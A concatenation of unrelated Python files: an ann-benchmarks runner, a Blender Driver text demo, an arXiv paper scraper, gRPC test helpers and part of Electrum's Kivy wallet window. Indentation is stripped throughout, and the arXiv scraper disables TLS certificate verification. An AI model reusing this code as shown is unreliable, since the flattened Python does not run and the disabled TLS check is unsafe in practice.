from ann_benchmarks.results import store_results
def run_individual_query(algo, X_train, X_test, distance, count, run_count,
batch):
prepared_queries = \
(batch and hasattr(algo, "prepare_batch_query")) or \
((not batch) and hasattr(algo, "prepare_query"))
best_search_time = float('inf')
for i in range(run_count):
print('Run %d/%d...' % (i + 1, run_count))
# a bit dumb, but it can't be a scalar because of Python's scoping rules
n_items_processed = [0]
def single_query(v):
if prepared_queries:
algo.prepare_query(v, count)
start = time.time()
algo.run_prepared_query()
total = (time.time() - start)
candidates = algo.get_prepared_query_results()
else:
start = time.time()
candidates = algo.query(v, count)
total = (time.time() - start)
candidates = [(int(idx), float(metrics[distance]['distance'](v, X_train[idx]))) # noqa
for idx in candidates]
n_items_processed[0] += 1
if n_items_processed[0] % 1000 == 0:
print('Processed %d/%d queries...' %
(n_items_processed[0], len(X_test)))
if len(candidates) > count:
print('warning: algorithm %s returned %d results, but count'
' is only %d' % (algo, len(candidates), count))
return (total, candidates)
def batch_query(X):
if prepared_queries:
algo.prepare_batch_query(X, count)
start = time.time()
algo.run_batch_query()
total = (time.time() - start)
else:
start = time.time()
algo.batch_query(X, count)
total = (time.time() - start)
results = algo.get_batch_results()
candidates = [[(int(idx), float(metrics[distance]['distance'](v, X_train[idx]))) # noqa
for idx in single_results]
for v, single_results in zip(X, results)]
return [(total / float(len(X)), v) for v in candidates]
if batch:
results = batch_query(X_test)
else:
results = [single_query(x) for x in X_test]
total_time = sum(time for time, _ in results)
total_candidates = sum(len(candidates) for _, candidates in results)
search_time = total_time / len(X_test)
avg_candidates = total_candidates / len(X_test)
best_search_time = min(best_search_time, search_time)
verbose = hasattr(algo, "query_verbose")
attrs = {
"batch_mode": batch,
"best_search_time": best_search_time,
"candidates": avg_candidates,
"expect_extra": verbose,
"name": str(algo),
"run_count": run_count,
"distance": distance,
"count": int(count)
}
additional = algo.get_additional()
for k in additional:
attrs[k] = additional[k]
return (attrs, results)
def run(definition, dataset, count, run_count, batch):
algo = instantiate_algorithm(definition)
assert not definition.query_argument_groups \
or hasattr(algo, "set_query_arguments"), """\
error: query argument groups have been specified for %s.%s(%s), but the \
algorithm instantiated from it does not implement the set_query_arguments \
function""" % (definition.module, definition.constructor, definition.arguments)
D = get_dataset(dataset)
X_train = numpy.array(D['train'])
X_test = numpy.array(D['test'])
distance = D.attrs['distance']
print('got a train set of size (%d * %d)' % X_train.shape)
print('got %d queries' % len(X_test))
X_train = dataset_transform[distance](X_train)
X_test = dataset_transform[distance](X_test)
try:
prepared_queries = False
if hasattr(algo, "supports_prepared_queries"):
prepared_queries = algo.supports_prepared_queries()
t0 = time.time()
memory_usage_before = algo.get_memory_usage()
algo.fit(X_train)
build_time = time.time() - t0
index_size = algo.get_memory_usage() - memory_usage_before
print('Built index in', build_time)
print('Index size: ', index_size)
query_argument_groups = definition.query_argument_groups
# Make sure that algorithms with no query argument groups still get run
# once by providing them with a single, empty, harmless group
if not query_argument_groups:
query_argument_groups = [[]]
for pos, query_arguments in enumerate(query_argument_groups, 1):
print("Running query argument group %d of %d..." %
(pos, len(query_argument_groups)))
if query_arguments:
algo.set_query_arguments(*query_arguments)
descriptor, results = run_individual_query(
algo, X_train, X_test, distance, count, run_count, batch)
descriptor["build_time"] = build_time
descriptor["index_size"] = index_size
descriptor["algo"] = get_algorithm_name(
definition.algorithm, batch)
descriptor["dataset"] = dataset
store_results(dataset, count, definition,
query_arguments, descriptor, results, batch)
finally:
algo.done()
def run_from_cmdline():
parser = argparse.ArgumentParser()
parser.add_argument(
'--dataset',
choices=DATASETS.keys(),
required=True)
parser.add_argument(
'--algorithm',
required=True)
parser.add_argument(
'--module',
required=True)
parser.add_argument(
'--constructor',
required=True)
parser.add_argument(
'--count',
required=True,
type=int)
parser.add_argument(
'--runs',
required=True,
type=int)
parser.add_argument(
'--batch',
action='store_true')
parser.add_argument(
'build')
parser.add_argument(
'queries',
nargs='*',
default=[])
args = parser.parse_args()
algo_args = json.loads(args.build)
query_args = [json.loads(q) for q in args.queries]
definition = Definition(
algorithm=args.algorithm,
docker_tag=None, # not needed
module=args.module,
constructor=args.constructor,
arguments=algo_args,
query_argument_groups=query_args,
disabled=False
)
run(definition, args.dataset, args.count, args.runs, args.batch)
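# A hypothetical invocation of run_from_cmdline() (dataset/algorithm names are
# placeholders that must exist in DATASETS and the algorithm definitions).
# The positional args are one JSON build-argument list followed by zero or
# more JSON query-argument groups:
#
#     --dataset glove-100-angular --algorithm annoy \
#         --module ann_benchmarks.algorithms.annoy --constructor Annoy \
#         --count 10 --runs 3 '[100]' '[1000, 2000]'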
def run_docker(definition, dataset, count, runs, timeout, batch, cpu_limit,
mem_limit=None):
cmd = ['--dataset', dataset,
'--algorithm', definition.algorithm,
'--module', definition.module,
'--constructor', definition.constructor,
'--runs', str(runs),
'--count', str(count)]
if batch:
cmd += ['--batch']
cmd.append(json.dumps(definition.arguments))
cmd += [json.dumps(qag) for qag in definition.query_argument_groups]
client = docker.from_env()
if mem_limit is None:
mem_limit = psutil.virtual_memory().available
print('Creating container: CPU limit %s, mem limit %s, timeout %d, command %s' % (cpu_limit, mem_limit, timeout, cmd))
container = client.containers.run(
definition.docker_tag,
cmd,
volumes={
os.path.abspath('ann_benchmarks'):
{'bind': '/home/app/ann_benchmarks', 'mode': 'ro'},
os.path.abspath('data'):
{'bind': '/home/app/data', 'mode': 'ro'},
os.path.abspath('results'):
{'bind': '/home/app/results', 'mode': 'rw'},
},
cpuset_cpus=cpu_limit,
mem_limit=mem_limit,
detach=True)
def stream_logs():
for line in container.logs(stream=True):
print(colors.color(line.decode().rstrip(), fg='blue'))
t = threading.Thread(target=stream_logs, daemon=True)
t.start()
try:
exit_code = container.wait(timeout=timeout)
# Report an error if the container exited with a non-zero code
if exit_code not in [0, None]:
print(colors.color(container.logs().decode(), fg='red'))
print('Child process raised exception %d' % exit_code)
except:
print('Container.wait failed with exception')
traceback.print_exc()
finally:
container.remove(force=True)
|
text.py
|
#!/usr/bin/python
# (c) 2018 Jim Hawkins. MIT licensed, see https://opensource.org/licenses/MIT
# Part of Blender Driver, see https://github.com/sjjhsjjh/blender-driver
"""Python module for Blender Driver demonstration application.
This module can only be used from within the Blender Game Engine."""
# Exit if run other than as a module.
if __name__ == '__main__':
print(__doc__)
raise SystemExit(1)
# Standard library imports, in alphabetic order.
#
# Module for command line switches.
# https://docs.python.org/3.5/library/argparse.html
# The import isn't needed because this class uses the base class to get an
# object.
# import argparse
#
# Module for levelled logging messages.
# Tutorial is here: https://docs.python.org/3.5/howto/logging.html
# Reference is here: https://docs.python.org/3.5/library/logging.html
import logging
from logging import DEBUG, INFO, WARNING, ERROR, log
#
# Module for degrees to radians conversion.
# https://docs.python.org/3.5/library/math.html#math.radians
from math import radians
#
# This module uses Thread and Lock classes.
# https://docs.python.org/3.4/library/threading.html#thread-objects
import threading
#
# Module for logging current time and sleep.
# https://docs.python.org/3.5/library/time.html
import time
#
# Third party modules, in alphabetic order.
#
# Blender library imports, in alphabetic order.
#
# These modules can only be imported if running from within Blender.
try:
# Main Blender Python interface.
# Import isn't needed because the base class keeps a reference to the
# interface object.
# import bpy
#
# Blender Game Engine KX_GameObject
# Import isn't needed because this class gets an object that has been
# created elsewhere.
# https://www.blender.org/api/blender_python_api_current/bge.types.KX_GameObject.html
#
# Blender Game Engine maths utilities, which can only be imported if running
# from within the Blender Game Engine.
# http://www.blender.org/api/blender_python_api_current/mathutils.html
# This class gets a Vector from the bpy layer, so Vector needn't be
# imported.
from mathutils import Matrix
#
# Font Drawing module, used to get text width.
# https://docs.blender.org/api/blender_python_api_current/blf.html
import blf
except ImportError as error:
print(__doc__)
print(error)
# Local imports.
#
# Blender Driver application with threads and locks.
from . import demonstration
# Diagnostic print to show when it's imported, if all its own imports run OK.
print("".join(('Application module "', __name__, '" ')))
class Application(demonstration.Application):
templates = {
'text': {'text':".\n.", 'physicsType':'NO_COLLISION'
, 'location': (0, 0, -1)},
'smalltext': {'text':"0\n0", 'physicsType':'NO_COLLISION'
, 'scale':(0.5, 0.5, 0.5)},
'cube': {'subtype':'Cube', 'physicsType':'NO_COLLISION'
, 'scale':(0.1, 0.1, 0.1) },
'counter': {'text':"counter text long", 'physicsType':'NO_COLLISION'},
'clock': {'text':"short", 'physicsType':'NO_COLLISION'}
}
# Override.
_instructions = "Ctrl-Q to terminate.\nTAB to traverse."
@property
def textBoxIndex(self):
return self._textBoxIndex
@textBoxIndex.setter
def textBoxIndex(self, textBoxIndex):
self._textBoxIndex = textBoxIndex % len(self._textBoxes)
self.update_info()
@property
def textBox(self):
return self._textBoxes[self.textBoxIndex]
@property
def textInfo(self):
return self._textInfo[self.textBoxIndex]
def position_cube(self):
if self._cube is not None:
cubePosition = self.textBox.worldPosition.copy()
self._cube.worldPosition = cubePosition
if self._cube2 is not None:
cubePosition = self.textBox.worldPosition.copy()
cubePosition[1] += self._textDimensions[self.textBoxIndex]
self._cube2.worldPosition = cubePosition
def update_info(self):
dimensions = list(blf.dimensions(0, self.textBox.text))
textWidth = self.text_width(self.textBox.text)
self._textDimensions[self.textBoxIndex] = textWidth
dimensions.append(textWidth)
self.position_cube()
self.textInfo.text = "\n".join(
"{:.2f}".format(_) for _ in dimensions)
# Override.
def game_initialise(self):
super().game_initialise()
self.mainLock.acquire()
try:
self._textBoxIndex = None
self._cube = None
self._cube2 = None
self._set_up_text_boxes()
self._objectClock = self.game_add_text("clock")
worldPosition = self.bannerObject.worldPosition.copy()
worldPosition[1] += 13.0
self._objectClock.worldPosition = worldPosition.copy()
#
# Counter object, which is a Blender Text.
self._objectCounter = self.game_add_text("counter")
self._objectCounterNumber = 0
self.position_counter()
self._cube = self.gameScene.addObject('cube', self.gameGateway)
self._cubeDimensions = self.bpy.data.objects['cube'].dimensions
log(DEBUG, "Cube dimensions: {}. World scale: {}."
, self._cubeDimensions, self._cube.worldScale)
self._cube2 = self.gameScene.addObject('cube', self.gameGateway)
# Next line invokes the setter, so the cube gets positioned.
self.textBoxIndex = 0
finally:
self.mainLock.release()
#
# Spawn a thread on which to cycle the counter.
threading.Thread(target=self.cycle_count_run).start()
def _set_up_text_boxes(self):
boxes = self.arguments.boxes
self._textBoxes = [None] * boxes
self._textDimensions = [None] * boxes
self._textInfo = [None] * boxes
worldPosition = None
yOffset = 5.0
for index in range(boxes):
object_ = self.game_add_text('text', str(index + 1))
if worldPosition is None:
worldPosition = object_.worldPosition.copy()
worldPosition[1] -= yOffset * 0.5 * boxes
else:
worldPosition[1] += yOffset
object_.worldPosition = worldPosition.copy()
self._textBoxes[index] = object_
object_ = self.game_add_text('smalltext')
infoPosition = worldPosition.copy()
infoPosition[2] += self.arguments.infoOffset
object_.worldPosition = infoPosition
self._textInfo[index] = object_
self.textBoxIndex = index
self.update_info()
def cycle_count_run(self):
"""Cycle a counter for ever. Run as a thread."""
counterReset = 1000
while True:
self.mainLock.acquire()
try:
if self.terminating():
log(DEBUG, "Stop.")
return
self._objectCounter.text = str(self._objectCounterNumber)
self._objectCounterNumber = (
(self._objectCounterNumber + 1) % counterReset)
finally:
self.mainLock.release()
if self.arguments.sleep is not None:
time.sleep(self.arguments.sleep)
def game_keyboard(self, keyEvents):
keyString, ctrl, alt = self.key_events_to_string(keyEvents)
log(DEBUG, '{} "{}" ctrl:{} alt:{} {} {}'
, keyEvents, keyString, ctrl, alt
, self.bge.events.BACKSPACEKEY, self.bge.events.TABKEY)
if keyString == "q" and ctrl:
self.game_terminate()
return
append = not (alt or ctrl)
textBox = self._textBoxes[self.textBoxIndex]
for key, status in keyEvents:
if status != self.bge.logic.KX_INPUT_JUST_ACTIVATED:
continue
if key == self.bge.events.TABKEY:
self.textBoxIndex += 1
append = False
if (key == self.bge.events.BACKSPACEKEY
and len(self.textBox.text) > 0
):
self.textBox.text = self.textBox.text[:-1]
self.update_info()
append = False
if append:
self.textBox.text = ''.join((self.textBox.text, keyString))
self.update_info()
def game_tick_run(self):
#
# Formally, run the base class tick. Actually, it's a pass.
super().game_tick_run()
self.mainLock.acquire()
try:
#
# Update the time displayed in the clock.
self._objectClock.text = time.strftime("%H:%M:%S")
#
# Slide the counter around.
self.position_counter()
finally:
self.mainLock.release()
def position_counter(self):
worldPosition = self._objectClock.worldPosition.copy()
worldPosition[2] -= 2.0
counterRange = 50
counterScale = 4.0
counterPosition = self._objectCounterNumber % (counterRange * 2)
if counterPosition > counterRange:
counterPosition = (counterRange * 2) - counterPosition
worldPosition[1] += (
(counterScale * float(counterPosition)) / float(counterRange))
self._objectCounter.worldPosition = worldPosition.copy()
def get_argument_parser(self):
"""Method that returns an ArgumentParser. Overriden."""
parser = super().get_argument_parser()
parser.prog = ".".join((__name__, self.__class__.__name__))
parser.add_argument(
'--boxes', type=int, default=3, help='Number of text boxes.')
parser.add_argument(
'--infoOffset', type=float, default=2.0, help=
'Vertical offset from a text box to its information panel.')
parser.add_argument(
'--sleep', type=float, help=
"Sleep after each increment, for a floating point number of"
" seconds. Default is not to sleep.")
return parser
|
download_arxiv_daily.py
|
import requests
import time
import pandas as pd
from bs4 import BeautifulSoup
import os
import random
import numpy as np
from tqdm import tqdm
from utils.multi_download import download
import multiprocessing as mp
from downloader.gather_info import create_markdown
from paperparse import std_parse_doc as spd
import glob
from configs import proxy, root_path
from utils.zip_tools import zip_ya
if not os.path.isdir(root_path): os.makedirs(root_path)
def get_one_page(url):
response = requests.get(url, proxies=proxy, verify=False)
while response.status_code == 403:
print("got HTTP 403, backing off before retrying")
time.sleep(5 + random.uniform(0, 5))
response = requests.get(url, proxies=proxy, verify=False)
if response.status_code == 200:
return response.text
return None
def get_paper_list():
url = 'https://arxiv.org/list/cs/pastweek?show=1000'
html = get_one_page(url)
soup = BeautifulSoup(html, features='html.parser')
all_day = soup.find_all('dl')
print("last day")
content = all_day[1]
list_ids = content.find_all('a', title='Abstract')
list_title = content.find_all('div', class_='list-title mathjax')
list_authors = content.find_all('div', class_='list-authors')
list_subjects = content.find_all('div', class_='list-subjects')
list_subject_split = []
for subjects in list_subjects:
subjects = subjects.text.split(': ', maxsplit=1)[1]
subjects = subjects.replace('\n\n', '')
subjects = subjects.replace('\n', '')
subject_split = subjects.split('; ')
list_subject_split.append(subject_split)
items = []
for i, paper in enumerate(zip(list_ids, list_title, list_authors, list_subjects, list_subject_split)):
items.append([paper[0].text, paper[1].text, paper[2].text, paper[3].text, paper[4]])
print("today")
content = all_day[0]
list_ids = content.find_all('a', title='Abstract')
list_title = content.find_all('div', class_='list-title mathjax')
list_authors = content.find_all('div', class_='list-authors')
list_subjects = content.find_all('div', class_='list-subjects')
list_subject_split = []
for subjects in list_subjects:
subjects = subjects.text.split(': ', maxsplit=1)[1]
subjects = subjects.replace('\n\n', '')
subjects = subjects.replace('\n', '')
subject_split = subjects.split('; ')
list_subject_split.append(subject_split)
for i, paper in enumerate(zip(list_ids, list_title, list_authors, list_subjects, list_subject_split)):
items.append([paper[0].text, paper[1].text, paper[2].text, paper[3].text, paper[4]])
name = ['id', 'title', 'authors', 'subjects', 'subject_split']
paper = pd.DataFrame(columns=name, data=items)
save_dir = os.path.join(root_path, time.strftime("%Y-%m-%d"))
if not os.path.isdir(save_dir): os.makedirs(save_dir)
paper.to_csv(os.path.join(save_dir, time.strftime("%Y-%m-%d") + '.csv'))
def get_abstract(arxiv_id='2101.12159'):
html = get_one_page("https://arxiv.org/abs/" + arxiv_id)
soup = BeautifulSoup(html, features='html.parser')
titles = soup.find_all('h1', class_='title mathjax')
title = titles[0].text
abstracts = soup.find_all('blockquote', class_='abstract mathjax')
abs = abstracts[0].text
abs = abs.replace('-\n', '') # re-join words hyphenated across line breaks
abs = abs.replace('\n', " ") # drop remaining line breaks
return title, abs
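# Usage sketch: fetch the title and abstract for one arXiv id (the default id
# above is only an example):
#     title, abstract = get_abstract('2101.12159')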
def save_markdown(save_dir, title, abs, url):
detail = {}
detail['title'] = title
detail['abs'] = abs
detail['url'] = url
np.save(os.path.join(save_dir, "details.npy"), detail)
# np.savetxt(os.path.join(save_dir, "abs.md"), [ss], "%s")
print("write abs txt finish")
def list_all_paper():
dirs = os.listdir(root_path)
total_paper = []
for d in dirs:
path = os.path.join(root_path, d)
files = os.listdir(path)
total_paper = total_paper + files
return total_paper
def check_is_exists(arxiv_id):
if arxiv_id in exist_papers:
return True
else:
return False
def download_paper(arxiv_id='2101.12159', paper_title=''):
# if check_is_exists(arxiv_id): # already downloaded in a previous run
# return None
selected_paper_id = arxiv_id.replace(".", "_")
pdfname = paper_title.replace("/", "_") # PDF file names cannot contain / or :
pdfname = pdfname.replace("?", "_")
pdfname = pdfname.replace("\"", "_")
pdfname = pdfname.replace("*", "_")
pdfname = pdfname.replace(":", "_")
pdfname = pdfname.replace("\n", "")
pdfname = pdfname.replace("\r", "")
pdfname = pdfname.replace("\\", "")
pdfname = pdfname.replace(" ", " ")
# print(time.strftime("%Y-%m-%d") + '/%s %s.pdf' % (selected_paper_id, paper_title))
if len(pdfname) > 130:
pdfname = pdfname[:100]
save_dir = os.path.join(root_path, time.strftime("%Y-%m-%d"), arxiv_id)
if not os.path.isdir(save_dir): os.makedirs(save_dir)
save_path = os.path.join(save_dir, arxiv_id + "_" + pdfname + ".pdf")
if os.path.exists(save_path): # skip if the file already exists
return save_path
try:
download('https://arxiv.org/pdf/' + arxiv_id + ".pdf", save_path)
except:
os.removedirs(save_dir)
raise RuntimeWarning('download error!')
# process the text
title, abs = get_abstract(arxiv_id)
print(arxiv_id)
save_markdown(save_dir, title, abs, 'https://arxiv.org/pdf/' + arxiv_id)
print("finish download")
return save_path
def get_daily_paper(key_words, subject_words, files):
if not (len(key_words) > 0 and len(subject_words) > 0):
print('Please provide both key words and subject words')
return None
global exist_papers
exist_papers = list_all_paper()
path_daily_paper = os.path.join(root_path, time.strftime("%Y-%m-%d"), time.strftime("%Y-%m-%d") + '.csv')
if not os.path.exists(path_daily_paper):
print('update paper list beginning')
get_paper_list()
print('update paper list finish')
paper = pd.read_csv(path_daily_paper)
selected_papers = paper[paper['title'].str.contains(key_words[0], case=False)]
for key_word in key_words[1:]:
selected_paper1 = paper[paper['title'].str.contains(key_word, case=False)]
selected_papers = pd.concat([selected_papers, selected_paper1], axis=0)
selected_papers.drop_duplicates(inplace=True)
selected_subject_papers = selected_papers[
selected_papers['subject_split'].str.contains(subject_words[0], case=False)]
for key_word in subject_words[1:]:
selected_paper1 = selected_papers[selected_papers['subject_split'].str.contains(key_word, case=False)]
selected_subject_papers = pd.concat([selected_subject_papers, selected_paper1], axis=0)
selected_subject_papers.drop_duplicates(inplace=True)
for i, t in zip(selected_subject_papers['id'], tqdm(selected_subject_papers['title'])):
id = i.split(':', maxsplit=1)[1]
title = t.split(':', maxsplit=1)[1]
print("process ", id)
try:
save_path = download_paper(id, title)
files.put(save_path)
print('finish ', id)
except:
print('cannot download', id)
files.put("finish")
print("put finish")
def finish(needPDF, needZip):
if not needPDF:
pdf = glob.glob(os.path.join(root_path, '*', '*', '*.pdf'))
for p in pdf:
os.remove(p)
if needZip:
zip_ya(root_path)
def process_context(files, share_dict, needPDF, needZip):
while True:
if not files.empty():
path_pdf = files.get()
if path_pdf is not None:
if path_pdf == 'finish':
np.savetxt(os.path.join(root_path, time.strftime("%Y-%m-%d"), "README.md"), [share_dict['all_md']],
"%s", encoding='utf-8')
finish(needPDF, needZip)
share_dict['break'] = 'true'
break
# all_md = create_markdown(spd, path_pdf, share_dict['all_md'])
# share_dict['all_md'] = all_md
try:
all_md = create_markdown(spd, path_pdf, share_dict['all_md'])
share_dict['all_md'] = all_md
except:
print("except =====>>>>>", path_pdf)
files.put(path_pdf)
time.sleep(1)
else:
time.sleep(1)
def start_parse(key_words, subject_words, needPDF=True, needZip=True):
with mp.Manager() as mg:
files = mp.Queue(30)
share_dict = mg.dict()  # reuse the Manager created above
share_dict['all_md'] = ''
share_dict['break'] = 'false'
p1 = mp.Process(target=process_context, args=(files, share_dict, needPDF, needZip))
p1.start()
get_daily_paper(key_words, subject_words, files)
# Block until the consumer process signals that it has finished.
while share_dict['break'] != 'true':
time.sleep(10)
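# A usage sketch (keyword and subject lists are hypothetical examples):
#     start_parse(key_words=['detection', 'segmentation'],
#                 subject_words=['cs.CV'], needPDF=True, needZip=True)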
|
_common.py
|
# Copyright 2017 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common utilities for tests of the Cython layer of gRPC Python."""
import collections
import threading
from grpc._cython import cygrpc
RPC_COUNT = 4000
INFINITE_FUTURE = cygrpc.Timespec(float('+inf'))
EMPTY_FLAGS = 0
INVOCATION_METADATA = cygrpc.Metadata(
(cygrpc.Metadatum(b'client-md-key', b'client-md-key'),
cygrpc.Metadatum(b'client-md-key-bin', b'\x00\x01' * 3000),))
INITIAL_METADATA = cygrpc.Metadata(
(cygrpc.Metadatum(b'server-initial-md-key', b'server-initial-md-value'),
cygrpc.Metadatum(b'server-initial-md-key-bin', b'\x00\x02' * 3000),))
TRAILING_METADATA = cygrpc.Metadata(
(cygrpc.Metadatum(b'server-trailing-md-key', b'server-trailing-md-value'),
cygrpc.Metadatum(b'server-trailing-md-key-bin', b'\x00\x03' * 3000),))
class QueueDriver(object):
def __init__(self, condition, completion_queue):
self._condition = condition
self._completion_queue = completion_queue
self._due = collections.defaultdict(int)
self._events = collections.defaultdict(list)
def add_due(self, tags):
if not self._due:
def in_thread():
while True:
event = self._completion_queue.poll()
with self._condition:
self._events[event.tag].append(event)
self._due[event.tag] -= 1
self._condition.notify_all()
if self._due[event.tag] <= 0:
self._due.pop(event.tag)
if not self._due:
return
thread = threading.Thread(target=in_thread)
thread.start()
for tag in tags:
self._due[tag] += 1
def event_with_tag(self, tag):
with self._condition:
while True:
if self._events[tag]:
return self._events[tag].pop(0)
else:
self._condition.wait()
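# A usage sketch for QueueDriver (tag value hypothetical): mark tags as due
# before starting the batch that completes them, then block until each tagged
# event arrives.
#
#     condition = threading.Condition()
#     driver = QueueDriver(condition, completion_queue)
#     with condition:
#         driver.add_due({b'my-tag'})
#     # ...start a batch whose completion event carries b'my-tag'...
#     event = driver.event_with_tag(b'my-tag')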
def execute_many_times(behavior):
return tuple(behavior() for _ in range(RPC_COUNT))
class OperationResult(
collections.namedtuple('OperationResult', (
'start_batch_result', 'completion_type', 'success',))):
pass
SUCCESSFUL_OPERATION_RESULT = OperationResult(
cygrpc.CallError.ok, cygrpc.CompletionType.operation_complete, True)
class RpcTest(object):
def setUp(self):
self.server_completion_queue = cygrpc.CompletionQueue()
self.server = cygrpc.Server(cygrpc.ChannelArgs([]))
self.server.register_completion_queue(self.server_completion_queue)
port = self.server.add_http2_port(b'[::]:0')
self.server.start()
self.channel = cygrpc.Channel('localhost:{}'.format(port).encode(),
cygrpc.ChannelArgs([]))
self._server_shutdown_tag = 'server_shutdown_tag'
self.server_condition = threading.Condition()
self.server_driver = QueueDriver(self.server_condition,
self.server_completion_queue)
with self.server_condition:
self.server_driver.add_due({
self._server_shutdown_tag,
})
self.client_condition = threading.Condition()
self.client_completion_queue = cygrpc.CompletionQueue()
self.client_driver = QueueDriver(self.client_condition,
self.client_completion_queue)
def tearDown(self):
self.server.shutdown(self.server_completion_queue,
self._server_shutdown_tag)
self.server.cancel_all_calls()
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import asyncio
from typing import TYPE_CHECKING, Optional, Union, Callable, Sequence
from electrum.storage import WalletStorage, StorageReadWriteError
from electrum.wallet_db import WalletDB
from electrum.wallet import Wallet, InternalAddressCorruption, Abstract_Wallet
from electrum.plugin import run_hook
from electrum import util
from electrum.util import (profiler, InvalidPassword, send_exception_to_crash_reporter,
format_satoshis, format_satoshis_plain, format_fee_satoshis,
maybe_extract_bolt11_invoice)
from electrum.invoices import PR_PAID, PR_FAILED
from electrum import blockchain
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum.interface import PREFERRED_NETWORK_PROTOCOL, ServerAddr
from .i18n import _
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
from .uix.dialogs.password_dialog import OpenWalletDialog, ChangePasswordDialog, PincodeDialog
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
from .uix.dialogs.question import Question
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
# Register a widget cache to keep memory usage down; a timeout of 0 means
# entries are cached forever.
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum.gui.kivy.uix.screens')
# Register fonts; without this you won't be able to use bold/italic
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum.util import (NoDynamicFeeEstimates, NotEnoughFunds)
from .uix.dialogs.lightning_open_channel import LightningOpenChannelDialog
from .uix.dialogs.lightning_channels import LightningChannelsDialog
if TYPE_CHECKING:
from . import ElectrumGui
from electrum.simple_config import SimpleConfig
from electrum.plugin import Plugins
from electrum.paymentrequest import PaymentRequest
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
lightning_gossip_num_peers = NumericProperty(0)
lightning_gossip_num_nodes = NumericProperty(0)
lightning_gossip_num_channels = NumericProperty(0)
lightning_gossip_num_queries = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
proxy_str = StringProperty('')
def update_proxy_str(self, proxy: dict):
mode = proxy.get('mode')
host = proxy.get('host')
port = proxy.get('port')
self.proxy_str = (host + ':' + port) if mode else _('None')
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = PREFERRED_NETWORK_PROTOCOL
def cb2(server_str):
popup.ids.server_str.text = server_str
servers = self.network.get_servers()
server_choices = {}
for _host, d in sorted(servers.items()):
port = d.get(protocol)
if port:
server = ServerAddr(_host, port, protocol=protocol)
server_choices[server.net_addr_str()] = _host
ChoiceDialog(_('Choose a server'), server_choices, popup.ids.server_str.text, cb2).open()
def maybe_switch_to_server(self, server_str: str):
net_params = self.network.get_parameters()
try:
server = ServerAddr.from_str_with_inference(server_str)
if not server: raise Exception("failed to parse")
except Exception as e:
self.show_error(_("Invalid server details: {}").format(repr(e)))
return
net_params = net_params._replace(server=server)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
android_backups = BooleanProperty(False)
def on_android_backups(self, instance, x):
self.electrum_config.set_key('android_backups', self.android_backups, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
if self.wallet:
self.wallet.use_change = self.use_change
self.wallet.db.put('use_change', self.use_change)
self.wallet.save_db()
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def set_ln_invoice(self, invoice):
self.switch_to('send')
